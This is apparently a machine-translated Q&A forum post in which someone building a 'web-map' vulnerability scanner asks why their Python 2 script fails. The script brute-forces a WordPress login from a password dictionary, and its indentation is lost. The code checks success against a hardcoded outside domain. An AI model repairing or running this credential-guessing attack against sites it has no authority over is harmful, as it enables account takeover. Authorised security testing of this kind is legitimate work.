0
我一直在做一個叫做web-map的程序。 它掃描網站的漏洞。 但我在暴力強制wordpress登錄時遇到了一些麻煩。 這是代碼蠻力強行登陸:如何用python用請求登錄wordpress?
def brute_login(tgt, dictionary):
s = requests.Session()
pass_found = False
user = raw_input("User: ")
intent = 0
tgt = tgt+"/wp-login"
f = open(dictionary, 'r')
for word in f.readlines():
password = word.strip('\n')
intent+=1
payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'}
print '[+] Trying with user: '+str(user)+' and password: '+str(password)+'\ttry: '+str(intent)
s.post(tgt, data=payload)
data = s.get("http://gerion.info/wp-admin").text
if 'Escritorio' in data or 'Desktop' in data:
print '[*] Password found: '+password
pass_found = True
else:
pass
我希望你能幫助我,謝謝!
我會的*認證*和* *登錄代碼添加到這個問題 –
什麼不工作? – payne